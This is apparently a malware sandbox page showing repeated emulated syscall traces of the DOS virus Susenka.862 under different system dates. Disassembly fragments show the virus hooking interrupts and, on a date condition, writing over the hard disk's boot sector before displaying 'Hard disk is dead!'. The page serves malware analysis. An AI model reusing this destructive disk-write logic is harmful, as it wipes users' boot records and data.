Sample viewer

vx.netlux.org/Virus.DOS.Susenka.862

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:08:43.521136913Z	252	PC: 12a72 \| UNKNOWN!
2018-12-17T23:08:43.522553984Z	82	PC: 9f869 \| Get DOS internal pointers (SYSVARS)
2018-12-17T23:08:43.523750907Z	42	PC: 9f894 \| Get date 0x9f894: cmp cx, 0x7c9 0x9f898: ja 0x9f89f 0x9f89a: cmp dh, 9 0x9f89d: jb 0x9f8de 0x9f89f: mov ax, 0xca8 0x9f8a2: mov word ptr [0x284], ax 0x9f8a5: xor ax, ax 0x9f8a7: mov word ptr [0x286], ax 0x9f8aa: mov word ptr [0x288], ax 0x9f8ad: mov byte ptr [0x28a], al 0x9f8b0: mov ax, 0x3509 0x9f8b3: int 0x21 0x9f8b5: mov word ptr [0x28b], bx 0x9f8b9: mov word ptr [0x28d], es 0x9f8bd: mov ax, 0x351c 0x9f8c0: int 0x21 0x9f8c2: mov word ptr [0x28f], bx 0x9f8c6: mov word ptr [0x291], es 0x9f8ca: mov ax, 0x251c 0x9f8cd: mov dx, 0x130
2018-12-17T23:08:43.525837695Z	53	PC: 9f8b5 \| Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T23:08:43.527389285Z	53	PC: 9f8c2 \| Get interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive')
2018-12-17T23:08:43.529061231Z	37	PC: 9f8d2 \| Set interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive')
2018-12-17T23:08:43.530123992Z	37	PC: 9f8dc \| Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T23:08:43.53159755Z	53	PC: 9f8e3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:08:43.53277182Z	37	PC: 9f8f7 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:08:43.534387951Z	42	PC: 9f8fd \| Get date 0x9f8fd: cmp al, 6 0x9f8ff: jne 0x9f914 0x9f901: cmp dl, 0xe 0x9f904: jne 0x9f914 0x9f906: mov ah, 3 0x9f908: mov al, 1 0x9f90a: mov dl, 0x80 0x9f90c: mov dh, 0 0x9f90e: mov ch, 0 0x9f910: mov cl, 1 0x9f912: int 0x13 0x9f914: mov si, 0x35b 0x9f917: mov es, word ptr [0x359] 0x9f91b: mov bx, 0x357 0x9f91e: mov di, 0x100 0x9f921: mov cx, 3 0x9f924: cld 0x9f925: rep movsb byte ptr es:[di], byte ptr [si] 0x9f927: mov si, bx 0x9f929: mov ax, es
2018-12-17T23:08:43.538030705Z	9	PC: 12a47 \| Display string (String= 'Hard disk is dead!')
2018-12-17T23:08:43.54044355Z	76	PC: 12a4b \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16292,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:52:30.209961013Z	252	PC: 12a72 \| UNKNOWN!
2018-12-25T12:52:30.211328599Z	82	PC: 9f869 \| Get DOS internal pointers (SYSVARS)
2018-12-25T12:52:30.212578644Z	42	PC: 9f894 \| Get date 0x9f894: cmp cx, 0x7c9 0x9f898: ja 0x9f89f 0x9f89a: cmp dh, 9 0x9f89d: jb 0x9f8de 0x9f89f: mov ax, 0xca8 0x9f8a2: mov word ptr [0x284], ax 0x9f8a5: xor ax, ax 0x9f8a7: mov word ptr [0x286], ax 0x9f8aa: mov word ptr [0x288], ax 0x9f8ad: mov byte ptr [0x28a], al 0x9f8b0: mov ax, 0x3509 0x9f8b3: int 0x21 0x9f8b5: mov word ptr [0x28b], bx 0x9f8b9: mov word ptr [0x28d], es 0x9f8bd: mov ax, 0x351c 0x9f8c0: int 0x21 0x9f8c2: mov word ptr [0x28f], bx 0x9f8c6: mov word ptr [0x291], es 0x9f8ca: mov ax, 0x251c 0x9f8cd: mov dx, 0x130
2018-12-25T12:52:30.214784276Z	53	PC: 9f8e3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.216420574Z	37	PC: 9f8f7 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.218233192Z	42	PC: 9f8fd \| Get date 0x9f8fd: cmp al, 6 0x9f8ff: jne 0x9f914 0x9f901: cmp dl, 0xe 0x9f904: jne 0x9f914 0x9f906: mov ah, 3 0x9f908: mov al, 1 0x9f90a: mov dl, 0x80 0x9f90c: mov dh, 0 0x9f90e: mov ch, 0 0x9f910: mov cl, 1 0x9f912: int 0x13 0x9f914: mov si, 0x35b 0x9f917: mov es, word ptr [0x359] 0x9f91b: mov bx, 0x357 0x9f91e: mov di, 0x100 0x9f921: mov cx, 3 0x9f924: cld 0x9f925: rep movsb byte ptr es:[di], byte ptr [si] 0x9f927: mov si, bx 0x9f929: mov ax, es
2018-12-25T12:52:30.22001629Z	9	PC: 12a47 \| Display string (String= 'Hard disk is dead!')
2018-12-25T12:52:30.221920895Z	76	PC: 12a4b \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16292,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:52:30.350743688Z	252	PC: 12a72 \| UNKNOWN!
2018-12-25T12:52:30.351686652Z	82	PC: 9f869 \| Get DOS internal pointers (SYSVARS)
2018-12-25T12:52:30.35269119Z	42	PC: 9f894 \| Get date 0x9f894: cmp cx, 0x7c9 0x9f898: ja 0x9f89f 0x9f89a: cmp dh, 9 0x9f89d: jb 0x9f8de 0x9f89f: mov ax, 0xca8 0x9f8a2: mov word ptr [0x284], ax 0x9f8a5: xor ax, ax 0x9f8a7: mov word ptr [0x286], ax 0x9f8aa: mov word ptr [0x288], ax 0x9f8ad: mov byte ptr [0x28a], al 0x9f8b0: mov ax, 0x3509 0x9f8b3: int 0x21 0x9f8b5: mov word ptr [0x28b], bx 0x9f8b9: mov word ptr [0x28d], es 0x9f8bd: mov ax, 0x351c 0x9f8c0: int 0x21 0x9f8c2: mov word ptr [0x28f], bx 0x9f8c6: mov word ptr [0x291], es 0x9f8ca: mov ax, 0x251c 0x9f8cd: mov dx, 0x130
2018-12-25T12:52:30.354155075Z	53	PC: 9f8b5 \| Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:52:30.355629096Z	53	PC: 9f8c2 \| Get interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive')
2018-12-25T12:52:30.356443543Z	37	PC: 9f8d2 \| Set interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive')
2018-12-25T12:52:30.357215201Z	37	PC: 9f8dc \| Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:52:30.358346129Z	53	PC: 9f8e3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.359283828Z	37	PC: 9f8f7 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.360033768Z	42	PC: 9f8fd \| Get date 0x9f8fd: cmp al, 6 0x9f8ff: jne 0x9f914 0x9f901: cmp dl, 0xe 0x9f904: jne 0x9f914 0x9f906: mov ah, 3 0x9f908: mov al, 1 0x9f90a: mov dl, 0x80 0x9f90c: mov dh, 0 0x9f90e: mov ch, 0 0x9f910: mov cl, 1 0x9f912: int 0x13 0x9f914: mov si, 0x35b 0x9f917: mov es, word ptr [0x359] 0x9f91b: mov bx, 0x357 0x9f91e: mov di, 0x100 0x9f921: mov cx, 3 0x9f924: cld 0x9f925: rep movsb byte ptr es:[di], byte ptr [si] 0x9f927: mov si, bx 0x9f929: mov ax, es
2018-12-25T12:52:30.361839656Z	9	PC: 12a47 \| Display string (String= 'Hard disk is dead!')
2018-12-25T12:52:30.36338935Z	76	PC: 12a4b \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1994,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16292,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:52:30.435836917Z	252	PC: 12a72 \| UNKNOWN!
2018-12-25T12:52:30.437190405Z	82	PC: 9f869 \| Get DOS internal pointers (SYSVARS)
2018-12-25T12:52:30.438851023Z	42	PC: 9f894 \| Get date 0x9f894: cmp cx, 0x7c9 0x9f898: ja 0x9f89f 0x9f89a: cmp dh, 9 0x9f89d: jb 0x9f8de 0x9f89f: mov ax, 0xca8 0x9f8a2: mov word ptr [0x284], ax 0x9f8a5: xor ax, ax 0x9f8a7: mov word ptr [0x286], ax 0x9f8aa: mov word ptr [0x288], ax 0x9f8ad: mov byte ptr [0x28a], al 0x9f8b0: mov ax, 0x3509 0x9f8b3: int 0x21 0x9f8b5: mov word ptr [0x28b], bx 0x9f8b9: mov word ptr [0x28d], es 0x9f8bd: mov ax, 0x351c 0x9f8c0: int 0x21 0x9f8c2: mov word ptr [0x28f], bx 0x9f8c6: mov word ptr [0x291], es 0x9f8ca: mov ax, 0x251c 0x9f8cd: mov dx, 0x130
2018-12-25T12:52:30.440669379Z	53	PC: 9f8b5 \| Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:52:30.441803923Z	53	PC: 9f8c2 \| Get interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive')
2018-12-25T12:52:30.443800216Z	37	PC: 9f8d2 \| Set interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive')
2018-12-25T12:52:30.445232719Z	37	PC: 9f8dc \| Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:52:30.446490244Z	53	PC: 9f8e3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.447873549Z	37	PC: 9f8f7 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.449231877Z	42	PC: 9f8fd \| Get date 0x9f8fd: cmp al, 6 0x9f8ff: jne 0x9f914 0x9f901: cmp dl, 0xe 0x9f904: jne 0x9f914 0x9f906: mov ah, 3 0x9f908: mov al, 1 0x9f90a: mov dl, 0x80 0x9f90c: mov dh, 0 0x9f90e: mov ch, 0 0x9f910: mov cl, 1 0x9f912: int 0x13 0x9f914: mov si, 0x35b 0x9f917: mov es, word ptr [0x359] 0x9f91b: mov bx, 0x357 0x9f91e: mov di, 0x100 0x9f921: mov cx, 3 0x9f924: cld 0x9f925: rep movsb byte ptr es:[di], byte ptr [si] 0x9f927: mov si, bx 0x9f929: mov ax, es
2018-12-25T12:52:30.451543481Z	9	PC: 12a47 \| Display string (String= 'Hard disk is dead!')
2018-12-25T12:52:30.455277274Z	76	PC: 12a4b \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16292,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:52:30.618788598Z	252	PC: 12a72 \| UNKNOWN!
2018-12-25T12:52:30.62115035Z	82	PC: 9f869 \| Get DOS internal pointers (SYSVARS)
2018-12-25T12:52:30.622225499Z	42	PC: 9f894 \| Get date 0x9f894: cmp cx, 0x7c9 0x9f898: ja 0x9f89f 0x9f89a: cmp dh, 9 0x9f89d: jb 0x9f8de 0x9f89f: mov ax, 0xca8 0x9f8a2: mov word ptr [0x284], ax 0x9f8a5: xor ax, ax 0x9f8a7: mov word ptr [0x286], ax 0x9f8aa: mov word ptr [0x288], ax 0x9f8ad: mov byte ptr [0x28a], al 0x9f8b0: mov ax, 0x3509 0x9f8b3: int 0x21 0x9f8b5: mov word ptr [0x28b], bx 0x9f8b9: mov word ptr [0x28d], es 0x9f8bd: mov ax, 0x351c 0x9f8c0: int 0x21 0x9f8c2: mov word ptr [0x28f], bx 0x9f8c6: mov word ptr [0x291], es 0x9f8ca: mov ax, 0x251c 0x9f8cd: mov dx, 0x130
2018-12-25T12:52:30.624224132Z	53	PC: 9f8e3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.625942582Z	37	PC: 9f8f7 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.626933749Z	42	PC: 9f8fd \| Get date 0x9f8fd: cmp al, 6 0x9f8ff: jne 0x9f914 0x9f901: cmp dl, 0xe 0x9f904: jne 0x9f914 0x9f906: mov ah, 3 0x9f908: mov al, 1 0x9f90a: mov dl, 0x80 0x9f90c: mov dh, 0 0x9f90e: mov ch, 0 0x9f910: mov cl, 1 0x9f912: int 0x13 0x9f914: mov si, 0x35b 0x9f917: mov es, word ptr [0x359] 0x9f91b: mov bx, 0x357 0x9f91e: mov di, 0x100 0x9f921: mov cx, 3 0x9f924: cld 0x9f925: rep movsb byte ptr es:[di], byte ptr [si] 0x9f927: mov si, bx 0x9f929: mov ax, es
2018-12-25T12:52:30.628915686Z	9	PC: 12a47 \| Display string (String= 'Hard disk is dead!')
2018-12-25T12:52:30.631429624Z	76	PC: 12a4b \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":5,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16292,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:52:30.674924847Z	252	PC: 12a72 \| UNKNOWN!
2018-12-25T12:52:30.676590473Z	82	PC: 9f869 \| Get DOS internal pointers (SYSVARS)
2018-12-25T12:52:30.688853283Z	42	PC: 9f894 \| Get date 0x9f894: cmp cx, 0x7c9 0x9f898: ja 0x9f89f 0x9f89a: cmp dh, 9 0x9f89d: jb 0x9f8de 0x9f89f: mov ax, 0xca8 0x9f8a2: mov word ptr [0x284], ax 0x9f8a5: xor ax, ax 0x9f8a7: mov word ptr [0x286], ax 0x9f8aa: mov word ptr [0x288], ax 0x9f8ad: mov byte ptr [0x28a], al 0x9f8b0: mov ax, 0x3509 0x9f8b3: int 0x21 0x9f8b5: mov word ptr [0x28b], bx 0x9f8b9: mov word ptr [0x28d], es 0x9f8bd: mov ax, 0x351c 0x9f8c0: int 0x21 0x9f8c2: mov word ptr [0x28f], bx 0x9f8c6: mov word ptr [0x291], es 0x9f8ca: mov ax, 0x251c 0x9f8cd: mov dx, 0x130
2018-12-25T12:52:30.691187211Z	53	PC: 9f8e3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.692789949Z	37	PC: 9f8f7 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.694201062Z	42	PC: 9f8fd \| Get date 0x9f8fd: cmp al, 6 0x9f8ff: jne 0x9f914 0x9f901: cmp dl, 0xe 0x9f904: jne 0x9f914 0x9f906: mov ah, 3 0x9f908: mov al, 1 0x9f90a: mov dl, 0x80 0x9f90c: mov dh, 0 0x9f90e: mov ch, 0 0x9f910: mov cl, 1 0x9f912: int 0x13 0x9f914: mov si, 0x35b 0x9f917: mov es, word ptr [0x359] 0x9f91b: mov bx, 0x357 0x9f91e: mov di, 0x100 0x9f921: mov cx, 3 0x9f924: cld 0x9f925: rep movsb byte ptr es:[di], byte ptr [si] 0x9f927: mov si, bx 0x9f929: mov ax, es
2018-12-25T12:52:30.697982226Z	9	PC: 12a47 \| Display string (String= 'Hard disk is dead!')
2018-12-25T12:52:30.700044121Z	76	PC: 12a4b \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":14,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16292,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:52:30.848794601Z	252	PC: 12a72 \| UNKNOWN!
2018-12-25T12:52:30.849709224Z	82	PC: 9f869 \| Get DOS internal pointers (SYSVARS)
2018-12-25T12:52:30.851607382Z	42	PC: 9f894 \| Get date 0x9f894: cmp cx, 0x7c9 0x9f898: ja 0x9f89f 0x9f89a: cmp dh, 9 0x9f89d: jb 0x9f8de 0x9f89f: mov ax, 0xca8 0x9f8a2: mov word ptr [0x284], ax 0x9f8a5: xor ax, ax 0x9f8a7: mov word ptr [0x286], ax 0x9f8aa: mov word ptr [0x288], ax 0x9f8ad: mov byte ptr [0x28a], al 0x9f8b0: mov ax, 0x3509 0x9f8b3: int 0x21 0x9f8b5: mov word ptr [0x28b], bx 0x9f8b9: mov word ptr [0x28d], es 0x9f8bd: mov ax, 0x351c 0x9f8c0: int 0x21 0x9f8c2: mov word ptr [0x28f], bx 0x9f8c6: mov word ptr [0x291], es 0x9f8ca: mov ax, 0x251c 0x9f8cd: mov dx, 0x130
2018-12-25T12:52:30.854993489Z	53	PC: 9f8e3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.857308872Z	37	PC: 9f8f7 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:52:30.859781439Z	42	PC: 9f8fd \| Get date 0x9f8fd: cmp al, 6 0x9f8ff: jne 0x9f914 0x9f901: cmp dl, 0xe 0x9f904: jne 0x9f914 0x9f906: mov ah, 3 0x9f908: mov al, 1 0x9f90a: mov dl, 0x80 0x9f90c: mov dh, 0 0x9f90e: mov ch, 0 0x9f910: mov cl, 1 0x9f912: int 0x13 0x9f914: mov si, 0x35b 0x9f917: mov es, word ptr [0x359] 0x9f91b: mov bx, 0x357 0x9f91e: mov di, 0x100 0x9f921: mov cx, 3 0x9f924: cld 0x9f925: rep movsb byte ptr es:[di], byte ptr [si] 0x9f927: mov si, bx 0x9f929: mov ax, es
2018-12-25T12:52:31.505694247Z	9	PC: 12a47 \| Display string (String= 'Hard disk is dead!')
2018-12-25T12:52:31.508298167Z	76	PC: 12a4b \| Terminate with return code (Return code = '36')